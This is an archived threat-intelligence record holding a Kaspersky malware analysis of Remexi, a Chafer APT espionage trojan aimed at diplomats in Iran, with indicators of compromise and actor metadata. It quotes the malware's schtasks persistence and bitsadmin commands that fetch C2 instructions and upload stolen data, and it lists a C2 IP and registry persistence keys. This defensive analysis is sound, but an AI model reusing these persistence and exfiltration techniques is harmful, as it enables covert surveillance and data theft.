{ "id": "67cb2d04-3ead-4794-afde-79d5a31ac2e1", "created_at": "2026-04-06T00:12:51.818482Z", "updated_at": "2026-04-10T13:11:31.206954Z", "deleted_at": null, "sha1_hash": "e108f8a8648ab67c7161441a325e5c88af915eb9", "title": "Chafer used Remexi malware to spy on Iran-based foreign diplomatic entities", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 93457, "plain_text": "Chafer used Remexi malware to spy on Iran-based foreign\r\ndiplomatic entities\r\nBy Denis Legezo\r\nPublished: 2019-01-30 · Archived: 2026-04-02 12:31:15 UTC\r\nExecutive Summary\r\nThroughout the autumn of 2018 we analyzed a long-standing (and still active at that time) cyber-espionage\r\ncampaign that was primarily targeting foreign diplomatic entities based in Iran. The attackers were using an\r\nimproved version of Remexi in what the victimology suggests might be a domestic cyber-espionage operation.\r\nThis malware has previously been associated with an APT actor that Symantec calls Chafer.\r\nThe malware can exfiltrate keystrokes, screenshots, browser-related data like cookies and history, decrypted when\r\npossible. The attackers rely heavily on Microsoft technologies on both the client and server sides: the Trojan uses\r\nstandard Windows utilities like Microsoft Background Intelligent Transfer Service (BITS) bitsadmin.exe to\r\nreceive commands and exfiltrate data. Its C2 is based on IIS using .asp technology to handle the victims’ HTTP\r\nrequests.\r\nRemexi developers use the C programming language and GCC compiler on Windows in the MinGW environment.\r\nThey most likely used the Qt Creator IDE in a Windows environment. The malware utilizes several persistence\r\nmechanisms including scheduled tasks, Userinit and Run registry keys in the HKLM hive.\r\nXOR and RC4 encryption is used with quite long unique keys for different samples. Among all these random keys\r\nonce the word “salamati” was also used, which means “health” in Farsi.\r\nKaspersky Lab products detect the malware described in this report as Trojan.Win32.Remexi and\r\nTrojan.Win32.Agent. This blogpost is based in our original report shared with our APT Intelligence Reporting\r\ncustomers last November 2018. For more information please contact: intelreports@kaspersky.com\r\nTechnical analysis\r\nThe main tool used in this campaign is an updated version of the Remexi malware, publicly reported by Symantec\r\nback in 2015. The newest module’s compilation timestamp is March 2018. The developers used GCC compiler on\r\nWindows in the MinGW environment.\r\nInside the binaries the compiler left references to the names of the C source file modules used: “operation_reg.c”,\r\n“thread_command.c” and “thread_upload.c”. Like mentioned in modules file names the malware consists of\r\nseveral working threads dedicated to different tasks, including C2 command parsing and data exfiltration. For both\r\nthe receiving of C2 commands and exfiltration, Remexi uses the Microsoft Background Intelligent Transfer\r\nService (BITS) mechanism to communicate with the C2 over HTTP.\r\nhttps://securelist.com/chafer-used-remexi-malware/89538/\r\nPage 1 of 8\n\nProliferation\r\nSo far, our telemetry hasn’t provided any concrete evidence that shows us how the Remexi malware spread.\r\nHowever, we think it’s worth mentioning that for one victim we found a correlation between the execution of\r\nRemexi´s main module and the execution of an AutoIt script compiled as PE, which we believe may have dropped\r\nthe malware. This dropper used an FTP with hardcoded credentials to receive its payload. FTP server was not\r\naccessible any more at the time of our analysis.\r\nMalware features\r\nRemexi boasts features that allow it to gather keystrokes, take screenshots of windows of interest (as defined in its\r\nconfiguration), steal credentials, logons and the browser history, and execute remote commands. Encryption\r\nconsists of XOR with a hardcoded key for its configuration and RC4 with a predefined password for encrypting\r\nthe victim’s data.\r\nRemexi includes different modules that it deploys in its working directory, including configuration decryption and\r\nparsing, launching victim activity logging in a separate module, and seven threads for various espionage and\r\nauxiliary functions. The Remexi developers seem to rely on legitimate Microsoft utilities, which we enumerate in\r\nthe table below.\r\nUtility Usage\r\nextract.exe Deploys modules from the .cab file into the working Event Cache directory\r\nbitsadmin.exe Fetches files from the C2 server to parse and execute commands. Send exfiltrated data\r\ntaskkill.exe Ends working cycle of modules\r\nPersistence\r\nPersistence modules are based on scheduled tasks and system registry. Mechanisms vary for different OS versions.\r\nIn the case of old Windows versions like XP, main module events.exe runs an edited XPTask.vbs Microsoft\r\nsample script to create a weekly scheduled task for itself. For newer operating systems, events.exe creates\r\ntask.xml as follows:\r\nThen it creates a Windows scheduled task using the following command:\r\nschtasks.exe /create /TN \\\"Events\\\\CacheTask_\" /XML \\\"t /F\"\r\nAt the system registry level, modules achieve persistence by adding themselves into the key:\r\nhttps://securelist.com/chafer-used-remexi-malware/89538/\r\nPage 2 of 8\n\nHKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit\r\nwhen it finds possible add values to the Winlogon subkey, and in\r\nHKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Activity Manager. All such indicators of\r\ncomprometation are mentioned in correspondent appendix below.\r\nCommands\r\nAll the commands received from the C2 are first saved to an auxiliary file and then stored encrypted in the system\r\nregistry. The standalone thread will decrypt and execute them.\r\nCommand Description\r\nsearch Searches for corresponding files\r\nsearch\u0026upload Encrypts and adds the corresponding files to the upload directory with the provided name\r\nuploadfile Encrypts and adds the specified file to the upload directory with the provided name\r\nuploadfolder Encrypts and adds the mentioned directory to the upload directory with the provided name\r\nshellexecute Silently executes received command with cmd.exe\r\nwmic Silently executes received command with wmic.exe (for WMI commands)\r\nsendIEPass Encrypts and adds all gathered browser data into files for upload to C2\r\nuninstall Removes files, directory and BITS tasks\r\nCryptography\r\nTo decrypt the configuration data, the malware uses XOR with 25-character keys such as\r\n“waEHleblxiQjoxFJQaIMLdHKz” that are different for every sample. RC4 file encryption relies on the Windows\r\n32 CryptoAPI, using the provided value’s MD5 hash as an initial vector. Among all these random keys once the\r\nword “salamati” was also used, which means “health” in Farsi.\r\nConfiguration\r\nConfig.ini is the file where the malware stores its encrypted configuration data. It contains the following fields:\r\nField Sample value Description\r\ndiskFullityCheckRatio 1.4\r\nMalware working directory size threshold. It will\r\nbe deleted if it becomes as large as the free\r\navailable space multiplied by this ratio\r\nhttps://securelist.com/chafer-used-remexi-malware/89538/\r\nPage 3 of 8\n\ncaptureScreenTimeOut 72 Probability of full and active window\r\nscreenshots being taken after mouse click captureActiveWindowTimeOut 313\r\ncaptureScreenQC 40 Not really used. Probably full and active window\r\nscreenshot quality captureActiveQC 40\r\nCaptureSites\r\nVPN*0,0\r\nLogin*0,0\r\nmail*0,0\r\nSecurity*0,0\r\nWindow titles of interest for screenshots, using\r\nleft mouse button and Enter keypress hook\r\nimportant\r\nupLog.txt\r\nupSCRLog.txt\r\nupSpecial.txt\r\nupFile.txt\r\nupMSLog.txt\r\nList of files to send to C2 using bitsadmin.exe\r\nfrom the dedicated thread\r\nmaxUpFileSizeKByte 1000000 Maximum size of file uploaded to C2\r\nServers http://108.61.189.174 Control server HTTP URL\r\nZipPass KtJvOXulgibfiHk Password for uploaded zip archives\r\nbrowserPasswordCheckTimeout 300000\r\nMilliseconds to wait between gathering key3.db,\r\ncookies.sqlite and other browser files in\r\ndedicated thread\r\nMost of the parameters are self-explanatory. However, captureScreenTimeOut and captureActiveWindowTimeOut\r\nare worth describing in more detail as their programming logic is not so intuitive.\r\nOne of the malware threads checks in an infinite loop if the mouse button was pressed and then also increments\r\nthe integer iterator infinitely. If the mouse hooking function registers a button hit, it lets the screenshotting thread\r\nknow about it through a global variable. After that, it checks if the iterator divided by\r\n(captureScreenTimeOut/captureActiveWindowTimeOut) has a remainder of 0. In that case, it takes a screenshot.\r\nMain module (events.exe)\r\nSHA256 b1fa803c19aa9f193b67232c9893ea57574a2055791b3de9f836411ce000ce31\r\nMD5 c981273c32b581de824e1fd66a19a281\r\nCompiled GCC compiler in MinGW environment version 2.24, timestamp set to 1970 by compiler\r\nType I386 Windows GUI EXE\r\nSize 68 608\r\nhttps://securelist.com/chafer-used-remexi-malware/89538/\r\nPage 4 of 8\n\nAfter checking that the malware is not already installed, it unpacks HCK.cab using the Microsoft standard utility\r\nexpand.exe with the following arguments:\r\nexpand.exe -r \\\"\\\" -f:* \\\"\\\\\\\"\r\nThen it decrypts config.ini file with a hardcoded 25-byte XOR key that differs for every sample. It sets keyboard\r\nand mouse hooks to its handlekeys() and MouseHookProc() functions respectively and starts several working\r\nthreads:\r\nID Thread description\r\n1 Gets commands from C2 and saves them to a file and system registry using the bitsadmin.exe utility\r\n2 Decrypts command from registry using RC4 with a hardcoded key, and executes it\r\n3\r\nTransfers screenshots from the clipboard to \\Cache005 subdirectory and Unicode text from clipboard to\r\nlog.txt, XOR-ed with the “salamati” key (“health” in Farsi)\r\n4\r\nTransfers screenshots to \\Cache005 subdirectory with captureScreenTimeOut and\r\ncaptureScreenTimeOut frequencies\r\n5 Checks network connection, encrypts and sends gathered logs\r\n6 Unhooks mouse and keyboard, removes bitsadmin task\r\n7 Checks if malware’s working directory size already exceeds its threshold\r\n8\r\nGathers victim´s credentials, visited website cache, decrypted Chrome login data, as well as Firefox\r\ndatabases with cookies, keys, signons and downloads\r\nThe malware uses the following command to receive data from its C2:\r\nbitsadmin.exe /TRANSFER HelpCenterDownload /DOWNLOAD /PRIORITY normal  \r\nhttp:///asp.asp?ui=nrg--\r\nActivity logging module (Splitter.exe)\r\nThis module is called from the main thread to obtain screenshots of windows whose titles are specified in the\r\nconfiguration CaptureSites field, bitmaps and text from clipboard, etc.\r\nSHA256 a77f9e441415dbc8a20ad66d4d00ae606faab370ffaee5604e93ed484983d3ff\r\nMD5 1ff40e79d673461cd33bd8b68f8bb5b8\r\nhttps://securelist.com/chafer-used-remexi-malware/89538/\r\nPage 5 of 8\n\nCompiled 2017.08.06 11:32:36 (GMT), 2.22\r\nType I386 Windows Console EXE\r\nSize 101 888\r\nInstead of implementing this auxiliary module in the form of a dynamic linked library with its corresponding\r\nexported functions, the developers decided to use a standalone executable started by events.exe with the following\r\nparameters:\r\nParameter Description\r\n-scr\r\nScreenshot file name to save in Cache006 subdirectory, zipped with password from\r\nconfiguration. Can capture all screen (“AllScreen”) or the active window (“ActiveWindow”)\r\n-ms\r\nScreenshot file name to save in Cache006 subdirectory, zipped with password from\r\nconfiguration. Specifies the screen coordinates to take\r\n-zip Name of password (from configuration data) protected zip archive\r\n-clipboard\r\nScreenshot file name where a bitmap from the clipboard is saved in Cache005 subdirectory,\r\nzipped with password from configuration\r\nData exfiltration\r\nExfiltration is done through the bitsadmin.exe utility. The BITS mechanism has existed since Windows XP up to\r\nthe current Windows 10 versions and was developed to create download/upload jobs, mostly to update the OS\r\nitself. The following is the command used to exfiltrate data from the victim to the C2:\r\nbitsadmin.exe /TRANSFER HelpCenterUpload /UPLOAD /PRIORITY normal \"/YP01__\" \"\"\r\nVictims\r\nThe vast majority of the users targeted by this new variant of Remexi appear to have Iranian IP addresses. Some of\r\nthese appear to be foreign diplomatic entities based in the country.\r\nAttribution\r\nThe Remexi malware has been associated with an APT actor called Chafer by Symantec.\r\nOne of the human-readable encryption keys used is “salamati”. This is probably the Latin spelling for the word\r\n“health” in Farsi. Among the artifacts related to malware authors, we found in the binaries a .pdb path containing\r\nthe Windows user name “Mohamadreza New”. Interestingly, the FBI website for wanted cybercriminals includes\r\ntwo Iranians called Mohammad Reza, although this could be a common name or even a false flag.\r\nhttps://securelist.com/chafer-used-remexi-malware/89538/\r\nPage 6 of 8\n\nConclusions\r\nActivity of the Chafer APT group has been observed since at least 2015, but based on things like compilation\r\ntimestamps and C\u0026C registration, it’s possible they have been active for even longer. Traditionally, Chafer has\r\nbeen focusing on targets inside Iran, although their interests clearly include other countries in the Middle East.\r\nWe will continue to monitor how this set of activity develops in the future.\r\nIndicators of compromise\r\nFile hashes\r\nevents.exe\r\n028515d12e9d59d272a2538045d1f636\r\n03055149340b7a1fd218006c98b30482\r\n25469ddaeff0dd3edb0f39bbe1dcdc46\r\n41b2339950d50cf678c0e5b34e68f537\r\n4bf178f778255b6e72a317c2eb8f4103\r\n7d1efce9c06a310627f47e7d70543aaf\r\n9f313e8ef91ac899a27575bc5af64051\r\naa6246dc04e9089e366cc57a447fc3a4\r\nc981273c32b581de824e1fd66a19a281\r\ndcb0ea3a540205ad11f32b67030c1e5a\r\nsplitter.exe\r\nc6721344af76403e9a7d816502dca1c8\r\nd3a2b41b1cd953d254c0fc88071e5027\r\n1FF40E79D673461CD33BD8B68F8BB5B8\r\necae141bb068131108c1cd826c82d88b\r\n12477223678e4a41020e66faebd3dd95\r\n460211f1c19f8b213ffaafcdda2a7295\r\n53e035273164f24c200262d61fa374ca\r\nDomains and IPs\r\n108.61.189.174\r\nHardcoded mutexes\r\nLocal\\TEMPDAHCE01\r\nLocal\\zaapr\r\nLocal\\reezaaprLog\r\nLocal\\{Temp-00-aa-123-mr-bbb}\r\nhttps://securelist.com/chafer-used-remexi-malware/89538/\r\nPage 7 of 8\n\nScheduled task\r\nCacheTask_\u003cuser_name_here\u003e\r\nDirectory with malicious modules\r\nMain malware directory: %APPDATA%\\Microsoft\\Event Cache\r\nCommands from C2 in subdirectory: Cache001\\cde00.acf\r\nEvents.exe persistence records in Windows system registry keys\r\nHKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit\r\nHKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Activity Manager\r\nVictims’ fingerprints stored in\r\nHKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\PidRegData or\r\nHKCU\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\PidRegData\r\nRC4 encrypted C2 commands stored in\r\nHKCU\\SOFTWARE\\Microsoft\\Fax\r\nHTTP requests template\r\nhttp://\u003cserver_ip_from_config\u003e/asp.asp?ui=\u003chost_name\u003enrg-\u003cadapter_info\u003e-\u003cuser_name\u003e\r\nAnd bitsadmin.exe task to external network resources, addressed by IP addresses\r\nSource: https://securelist.com/chafer-used-remexi-malware/89538/\r\nhttps://securelist.com/chafer-used-remexi-malware/89538/\r\nPage 8 of 8", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "MISPGALAXY", "Malpedia", "MITRE" ], "origins": [ "web" ], "references": [ "https://securelist.com/chafer-used-remexi-malware/89538/" ], "report_names": [ "89538" ], "threat_actors": [ { "id": "62947fad-14d2-40bf-a721-b1fc2fbe5b5d", "created_at": "2025-08-07T02:03:24.741594Z", "updated_at": "2026-04-10T02:00:03.653394Z", "deleted_at": null, "main_name": "COBALT HICKMAN", "aliases": [ "APT39 ", "Burgundy Sandstorm ", "Chafer ", "ITG07 ", "Remix Kitten " ], "source_name": "Secureworks:COBALT HICKMAN", "tools": [ "MechaFlounder", "Mimikatz", "Remexi", "TREKX" ], "source_id": "Secureworks", "reports": null }, { "id": "bee22874-f90e-410b-93f3-a2f9b1c2e695", "created_at": "2022-10-25T16:07:23.45097Z", "updated_at": "2026-04-10T02:00:04.610108Z", "deleted_at": null, "main_name": "Chafer", "aliases": [ "APT 39", "Burgundy Sandstorm", "Cobalt Hickman", "G0087", "ITG07", "Radio Serpens", "Remix Kitten", "TA454" ], "source_name": "ETDA:Chafer", "tools": [ "ASPXSpy", "ASPXTool", "Antak", "CACHEMONEY", "EternalBlue", "HTTPTunnel", "LOLBAS", "LOLBins", "Living off the Land", "MechaFlounder", "Metasploit", "Mimikatz", "NBTscan", "NSSM", "Non-sucking Service Manager", "POWBAT", "Plink", "PuTTY Link", "Rana", "Remcom", "Remexi", "RemoteCommandExecution", "SafetyKatz", "UltraVNC", "WCE", "Windows Credential Editor", "Windows Credentials Editor", "nbtscan", "pwdump" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434371, "ts_updated_at": 1775826691, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/e108f8a8648ab67c7161441a325e5c88af915eb9.pdf", "text": "https://archive.orkl.eu/e108f8a8648ab67c7161441a325e5c88af915eb9.txt", "img": "https://archive.orkl.eu/e108f8a8648ab67c7161441a325e5c88af915eb9.jpg" } }